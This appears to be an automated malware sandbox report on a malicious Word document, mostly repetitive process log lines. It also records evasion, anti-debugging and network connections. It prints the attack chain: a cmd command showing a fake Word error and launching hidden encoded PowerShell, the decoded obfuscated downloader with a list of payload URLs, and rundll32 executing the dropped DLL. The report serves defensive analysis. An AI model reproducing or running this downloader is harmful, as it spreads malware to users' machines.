Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2584 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: powershell.exe, 00000005.00000002.2107269724.0000000000394000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10003D55 mov eax, dword ptr fs:[00000030h] 7_2_10003D55
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory protected: page execute read | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 69.49.88.46 80 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 71.72.196.159 80 Jump to behavior
Encrypted powershell cmdline option found
Source: unknown Process created: Base64 decoded $0e2tk=[tyPe]("{2}{1}{0}{3}{4}"-f'I','m.','SystE','o.Di','reCTory'); set-itEM vAriabLE:wd8 ( [TyPe]("{1}{2}{0}{3}{4}" -f'VIcEPOiNtMana','SySt','eM.NEt.seR','g','Er')) ;$ErrorActionPreference = (('Sile'+'n')+('tlyCo'+'n')+'t'+('in'+'ue'));$N3176cr=$Q25U + [char](64) + $V96R;$C_1Q=('M9'+'5I'); ( VarIABLe 0E2tK ).vaLUE::"crEATeD`IReC`TORY"($HOME + ((('BJlWd'+'d')+('uy2'+'mB')+'J'+('lTmc'+'1')+('k'+'uo')+'BJ'+'l')."RE`p`LacE"(('B'+'Jl'),'\')));$N73P=('K'+('0'+'3V')); $WD8::"s`E`cURitYPrOToc`ol" = ('Tl'+('s'+'12'));$W_5K=(('T'+'88')+'J');$Iyqxv9_ = (('J7'+'0')+'H');$L12K=('Y0'+'3C');$Ojihnwg=$HOME+((('QLOWdd'+'u'+'y2')+'m'+('QL'+'O')+'Tm'+('c'+'1ku')+('oQL'+'O'))."R`ePla`ce"(([char]81+[char]76+[char]79),'\'))+$Iyqxv9_+(('.'+'dl')+'l');$A09L=('X'+('68'+'K'));$X4_1q8q=('w]'+'xm'+('[v'+'s://'+'shul')+'o'+('v'+'baa'+'zar.com')+'/'+'c'+('/'+'bcL6/')+('@'+'w]xm')+('[v'+'s')+':/'+('/m'+'yb')+('us'+'i')+('ness'+'e'+'ven')+('t'+'.com')+('/ti'+'ki')+('-'+'in')+('sta'+'l'+'l'+'/e/@')+('w]xm'+'[v'+':')+('//u'+'hk'+'.cn')+('cr'+'anes')+'.c'+('o'+'m/')+('E'+'rr')+'o'+('r'+'Pages')+'/3'+'/'+'@'+('w]xm'+'[vs')+':/'+'/'+'ca'+'p'+('tur'+'e'+'theac')+'ti'+'o'+'n'+'.'+('com.'+'au')+('/'+'wp-'+'inc')+'lu'+'d'+('es'+'/Y')+'jp'+('/@'+'w]'+'xm[vs:'+'//th')+'en'+('e'+'tw'+'ork'+'er.c')+('a'+'/c')+'om'+'me'+'nt'+'/'+'8'+'N4'+'/'+'@'+'w'+(']xm'+'[v')+('s:'+'/')+('/'+'tr')+('a'+'yonlin')+'e'+'g'+'h.'+('co'+'m/'+'cgi-bi')+('n'+'/HBP'+'R/@')+'w]'+'xm'+('[v'+'://mmo'+'.')+('m'+'ar')+'ti'+('npollo'+'
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded $0e2tk=[tyPe]("{2}{1}{0}{3}{4}"-f'I','m.','SystE','o.Di','reCTory'); set-itEM vAriabLE:wd8 ( [TyPe]("{1}{2}{0}{3}{4}" -f'VIcEPOiNtMana','SySt','eM.NEt.seR','g','Er')) ;$ErrorActionPreference = (('Sile'+'n')+('tlyCo'+'n')+'t'+('in'+'ue'));$N3176cr=$Q25U + [char](64) + $V96R;$C_1Q=('M9'+'5I'); ( VarIABLe 0E2tK ).vaLUE::"crEATeD`IReC`TORY"($HOME + ((('BJlWd'+'d')+('uy2'+'mB')+'J'+('lTmc'+'1')+('k'+'uo')+'BJ'+'l')."RE`p`LacE"(('B'+'Jl'),'\')));$N73P=('K'+('0'+'3V')); $WD8::"s`E`cURitYPrOToc`ol" = ('Tl'+('s'+'12'));$W_5K=(('T'+'88')+'J');$Iyqxv9_ = (('J7'+'0')+'H');$L12K=('Y0'+'3C');$Ojihnwg=$HOME+((('QLOWdd'+'u'+'y2')+'m'+('QL'+'O')+'Tm'+('c'+'1ku')+('oQL'+'O'))."R`ePla`ce"(([char]81+[char]76+[char]79),'\'))+$Iyqxv9_+(('.'+'dl')+'l');$A09L=('X'+('68'+'K'));$X4_1q8q=('w]'+'xm'+('[v'+'s://'+'shul')+'o'+('v'+'baa'+'zar.com')+'/'+'c'+('/'+'bcL6/')+('@'+'w]xm')+('[v'+'s')+':/'+('/m'+'yb')+('us'+'i')+('ness'+'e'+'ven')+('t'+'.com')+('/ti'+'ki')+('-'+'in')+('sta'+'l'+'l'+'/e/@')+('w]xm'+'[v'+':')+('//u'+'hk'+'.cn')+('cr'+'anes')+'.c'+('o'+'m/')+('E'+'rr')+'o'+('r'+'Pages')+'/3'+'/'+'@'+('w]xm'+'[vs')+':/'+'/'+'ca'+'p'+('tur'+'e'+'theac')+'ti'+'o'+'n'+'.'+('com.'+'au')+('/'+'wp-'+'inc')+'lu'+'d'+('es'+'/Y')+'jp'+('/@'+'w]'+'xm[vs:'+'//th')+'en'+('e'+'tw'+'ork'+'er.c')+('a'+'/c')+'om'+'me'+'nt'+'/'+'8'+'N4'+'/'+'@'+'w'+(']xm'+'[v')+('s:'+'/')+('/'+'tr')+('a'+'yonlin')+'e'+'g'+'h.'+('co'+'m/'+'cgi-bi')+('n'+'/HBP'+'R/@')+'w]'+'xm'+('[v'+'://mmo'+'.')+('m'+'ar')+'ti'+('npollo'+' Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAAwAGUAMgB0AGsAPQBbAHQAeQBQAGUAXQAoACIAewAyAH0AewAxAH0AewAwAH0AewAzAH0AewA0AH0AIgAtAGYAJwBJACcALAAnAG0ALgAnACwAJwBTAHkAcwB0AEUAJwAsACcAbwAuAEQAaQAnACwAJwByAGUAQwBUAG8AcgB5ACcAKQA7ACAAcwBlAHQALQBpAHQARQBNACAAIAB2AEEAcgBpAGEAYgBMAEUAOgB3AGQAOAAgACAAKAAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADIAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAVgBJAGMARQBQAE8AaQBOAHQATQBhAG4AYQAnACwAJwBTAHkAUwB0ACcALAAnAGUATQAuAE4ARQB0AC4AcwBlAFIAJwAsACcAZwAnACwAJwBFAHIAJwApACkAIAA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpAGwAZQAnACsAJwBuACcAKQArACgAJwB0AGwAeQBDAG8AJwArACcAbgAnACkAKwAnAHQAJwArACgAJwBpAG4AJwArACcAdQBlACcAKQApADsAJABOADMAMQA3ADYAYwByAD0AJABRADIANQBVACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABWADkANgBSADsAJABDAF8AMQBRAD0AKAAnAE0AOQAnACsAJwA1AEkAJwApADsAIAAgACgAIAAgAFYAYQByAEkAQQBCAEwAZQAgACAAMABFADIAdABLACAAKQAuAHYAYQBMAFUARQA6ADoAIgBjAHIARQBBAFQAZQBEAGAASQBSAGUAQwBgAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEIASgBsAFcAZAAnACsAJwBkACcAKQArACgAJwB1AHkAMgAnACsAJwBtAEIAJwApACsAJwBKACcAKwAoACcAbABUAG0AYwAnACsAJwAxACcAKQArACgAJwBrACcAKwAnAHUAbwAnACkAKwAnAEIASgAnACsAJwBsACcAKQAuACIAUgBFAGAAcABgAEwAYQBjAEUAIgAoACgAJwBCACcAKwAnAEoAbAAnACkALAAnAFwAJwApACkAKQA7ACQATgA3ADMAUAA9ACgAJwBLACcAKwAoACcAMAAnACsAJwAzAFYAJwApACkAOwAgACQAVwBEADgAOgA6ACIAcwBgAEUAYABjAFUAUgBpAHQAWQBQAHIATwBUAG8AYwBgAG8AbAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVwBfADUASwA9ACgAKAAnAFQAJwArACcAOAA4ACcAKQArACcASgAnACkAOwAkAEkAeQBxAHgAdgA5AF8AIAA9ACAAKAAoACcASgA3ACcAKwAnADAAJwApACsAJwBIACcAKQA7ACQATAAxADIASwA9ACgAJwBZADAAJwArACcAMwBDACcAKQA7ACQATwBqAGkAaABuAHcAZwA9ACQASABPAE0ARQArACgAKAAoACcAUQBMAE8AVwBkAGQAJwArACcAdQAnACsAJwB5ADIAJwApACsAJwBtACcAKwAoACcAUQBMACcAKwAnAE8AJwApACsAJwBUAG0AJwArACgAJwBjACcAKwAnADEAawB1ACcAKQArACgAJwBvAFEATAAnACsAJwBPACcAKQApAC4AIgBSAGAAZQBQAGwAYQBgAGMAZQAiACgAKABbAGMAaABhAHIAXQA4ADEAKwBbAGMAaABhAHIAXQA3ADYAKwBbAGMAaABhAHIAXQA3ADkAKQAsACcAXAAnACkAKQArACQASQB5AHEAeAB2ADkAXwArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAEEAMAA5AEwAPQAoACcAWAAnACsAKAAnADYAOAAnACsAJwBLACcAKQApADsAJABYADQAXwAxAHEAOABxAD0AKAAnAHcAXQAnACsAJwB4AG0AJwArACgAJwBbAHYAJwArACcAcwA6AC8ALwAnACsAJwBzAGgAdQBsACcAKQArACcAbwAnACsAKAAnAHYAJwArACcAYgBhAGEAJwArACcAegBhAHIALgBjAG8AbQAnACkAKwAnAC8AJwArACcAYwAnACsAKAAnAC8AJwArACcAYgBjAEwANgAvACcAKQArACgAJwBAACcAKwAnAHcAXQB4AG0AJwApACsAKAAnAFsAdgAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwBtACcAKwAnAHkAYgAnACkAKwAoACcAdQBzACcAKwAnAGkAJwApACsAKAAnAG4AZQBzAHMAJwArACcAZQAnACsAJwB2AGUAbgAnACkAKwAoACcAdAAnACsAJwAuAGMAbwBtACcAKQArACgAJwAvAHQAaQAnACsAJwBrAGkAJwApACsAKAAnAC0AJwArACcAaQBuACcAKQArACgAJwBzAHQAYQAnACsAJwBsACcAKwAnAGwAJwArACcALwBlAC8AQAAnACkAKwAoACcAdwBdAHgAbQAnACsAJwBbAHYAJwArACcAOgAnACkAKwAoACcALwAvAHUAJwArACcAaABrACcAKwAnAC4AYwBuACcAKQArACgAJwBjAHIAJwArACcAYQBuAGUAcwAnACkAKwAnAC4AYwAnACsAKAAnAG8AJwArACcAbQAvACcAKQArACgAJwBFACcAKwAnAHIAcgAnACkAKwAnAG8AJwArACgAJwByACcAKwAnAFAAYQBnAGUAcwAnACkAKwAnAC8AM Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Wdduy2m\Tmc1kuo\J70H.dll ShowDialogA Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Wdduy2m\Tmc1kuo\J70H.dll ShowDialogA Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qafsungwqhhv\abffsuupeze.glo',ShowDialogA Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hqmvwbjvtszlkw\wwuzivduoqkxt.pxe',ShowDialogA Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Aanys\cokk.vuq',ShowDialogA Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD JAAwAGUAMgB0AGsAPQBbAHQAeQBQAGUAXQAoACIAewAyAH0AewAxAH0AewAwAH0AewAzAH0AewA0AH0AIgAtAGYAJwBJACcALAAnAG0ALgAnACwAJwBTAHkAcwB0AEUAJwAsACcAbwAuAEQAaQAnACwAJwByAGUAQwBUAG8AcgB5ACcAKQA7ACAAcwBlAHQALQBpAHQARQBNACAAIAB2AEEAcgBpAGEAYgBMAEUAOgB3AGQAOAAgACAAKAAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADIAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAVgBJAGMARQBQAE8AaQBOAHQATQBhAG4AYQAnACwAJwBTAHkAUwB0ACcALAAnAGUATQAuAE4ARQB0AC4AcwBlAFIAJwAsACcAZwAnACwAJwBFAHIAJwApACkAIAA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpAGwAZQAnACsAJwBuACcAKQArACgAJwB0AGwAeQBDAG8AJwArACcAbgAnACkAKwAnAHQAJwArACgAJwBpAG4AJwArACcAdQBlACcAKQApADsAJABOADMAMQA3ADYAYwByAD0AJABRADIANQBVACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABWADkANgBSADsAJABDAF8AMQBRAD0AKAAnAE0AOQAnACsAJwA1AEkAJwApADsAIAAgACgAIAAgAFYAYQByAEkAQQBCAEwAZQAgACAAMABFADIAdABLACAAKQAuAHYAYQBMAFUARQA6ADoAIgBjAHIARQBBAFQAZQBEAGAASQBSAGUAQwBgAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEIASgBsAFcAZAAnACsAJwBkACcAKQArACgAJwB1AHkAMgAnACsAJwBtAEIAJwApACsAJwBKACcAKwAoACcAbABUAG0AYwAnACsAJwAxACcAKQArACgAJwBrACcAKwAnAHUAbwAnACkAKwAnAEIASgAnACsAJwBsACcAKQAuACIAUgBFAGAAcABgAEwAYQBjAEUAIgAoACgAJwBCACcAKwAnAEoAbAAnACkALAAnAFwAJwApACkAKQA7ACQATgA3ADMAUAA9ACgAJwBLACcAKwAoACcAMAAnACsAJwAzAFYAJwApACkAOwAgACQAVwBEADgAOgA6ACIAcwBgAEUAYABjAFUAUgBpAHQAWQBQAHIATwBUAG8AYwBgAG8AbAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVwBfADUASwA9ACgAKAAnAFQAJwArACcAOAA4ACcAKQArACcASgAnACkAOwAkAEkAeQBxAHgAdgA5AF8AIAA9ACAAKAAoACcASgA3ACcAKwAnADAAJwApACsAJwBIACcAKQA7ACQATAAxADIASwA9ACgAJwBZADAAJwArACcAMwBDACcAKQA7ACQATwBqAGkAaABuAHcAZwA9ACQASABPAE0ARQArACgAKAAoACcAUQBMAE8AVwBkAGQAJwArACcAdQAnACsAJwB5ADIAJwApACsAJwBtACcAKwAoACcAUQBMACcAKwAnAE8AJwApACsAJwBUAG0AJwArACgAJwBjACcAKwAnADEAawB1ACcAKQArACgAJwBvAFEATAAnACsAJwBPACcAKQApAC4AIgBSAGAAZQBQAGwAYQBgAGMAZQAiACgAKABbAGMAaABhAHIAXQA4ADEAKwBbAGMAaABhAHIAXQA3ADYAKwBbAGMAaABhAHIAXQA3ADkAKQAsACcAXAAnACkAKQArACQASQB5AHEAeAB2ADkAXwArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAEEAMAA5AEwAPQAoACcAWAAnACsAKAAnADYAOAAnACsAJwBLACcAKQApADsAJABYADQAXwAxAHEAOABxAD0AKAAnAHcAXQAnACsAJwB4AG0AJwArACgAJwBbAHYAJwArACcAcwA6AC8ALwAnACsAJwBzAGgAdQBsACcAKQArACcAbwAnACsAKAAnAHYAJwArACcAYgBhAGEAJwArACcAegBhAHIALgBjAG8AbQAnACkAKwAnAC8AJwArACcAYwAnACsAKAAnAC8AJwArACcAYgBjAEwANgAvACcAKQArACgAJwBAACcAKwAnAHcAXQB4AG0AJwApACsAKAAnAFsAdgAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwBtACcAKwAnAHkAYgAnACkAKwAoACcAdQBzACcAKwAnAGkAJw